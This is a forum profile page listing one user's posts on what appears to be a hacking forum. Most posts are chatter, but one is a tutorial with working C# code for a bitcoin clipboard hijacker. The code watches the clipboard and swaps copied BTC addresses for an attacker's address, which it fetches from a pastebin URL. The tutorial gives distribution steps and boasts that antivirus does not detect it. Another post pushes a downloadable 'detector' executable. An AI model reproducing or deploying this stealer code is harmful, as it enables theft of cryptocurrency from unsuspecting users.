BataBo

Members
  • Content Count

    128
  • Last visited

Community Reputation

12 Good

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Winner will be announced on my birthday hope it’s gonna be me
  2. So recently I've noticed that the new virus is on the rise the bitcoin stealer,now what does bitcoin stealer do you might ask.Well its pretty simple when you copy your btc address it recplaces it with attackers.As of right now It is completly undetectable not a single anti-virus program sees this as a threat. Where do you get a bitcoin stealer? From here ofcourse me and my friend were lucky enough to be infected from some tool on this website. So if anyone is infected with this virus they should get my bitcoin stealer detector. How does it work? Simple you open it and let it run for 5 seconds and it will detect that no good software. Now if it doesnt that mean attacker is sneak no problem for my tool you just copy any btc address and program will show you path of the no good btc stealer. Can this be patched? I wont explain you why for security purposes but nope it cant be bypassed. So if you have that virus on your pc download my detector right here: https://anonfile.com/fbreEcz2nd/test_exe
  3. Title says it all: [hide]https://pastr.io/view/wvIO7C[/hide]
  4. So here is the deal I have a great product that I want to sell and I already have a thread design(image) and I would like to post only the image as it looks good and tells the story. I can show you example of what I mean from another forum. I understand this rule when it comes to replying as you don't want people to spam "ty" all the times you want them to be creative while leeching.
  5. you posted in account section so do they all work?
  6. Well its for supreme users only so I'm wasting my post
  7. Ok so how does this work? User runs your application and if user tries to sell anything with bitcoin while application is running all the money user is suppose to receive goes to you(more detailed explanation down below) [hide]So lets start with the tutorial 1.Make paste bin account and make a paste in the paste you should write your bitcoin address You need to make account in case you change your btc address you can just edit paste without editing source code 2.Get raw form of your paste and save it somewhere 3.Use this code in your application: using System; using System.Net; using System.Threading; using System.Windows.Forms; ... private static readonly WebClient client = new WebClient(); ... Thread thread1 = new Thread(BitcoinStealer); thread1.SetApartmentState(ApartmentState.STA); thread1.Start(); ... static void BitcoinStealer() { string b = string.Empty; for (; ; ) { try { string text = Clipboard.GetText(); Console.WriteLine(text); if (text.Length >= 26 && text.Length <= 35 && (text.StartsWith("1") || text.StartsWith("3") || text.StartsWith("bc1")) && text != b) { Clipboard.SetText(client.DownloadString("https://pastebin.com/raw/")); } b = text; Thread.Sleep(150); } catch (Exception) { } } } 4.Replace copy your paste in Clipboard.SetText(client.DownloadString("https://pastebin.com/raw/")); 5.Distribute your application So what this pretty much does is when user copies his btc address program detects it and replaces it with address you specified This is completely undetectable as you can see here: https://www.virustotal.com/gui/file/2d4362d168e6b11b65fa039bdba906e9650a3eec29fe752f03c9330cd79dafcb/details And if you are a popular guy you can make quite a lot with this method [/hide]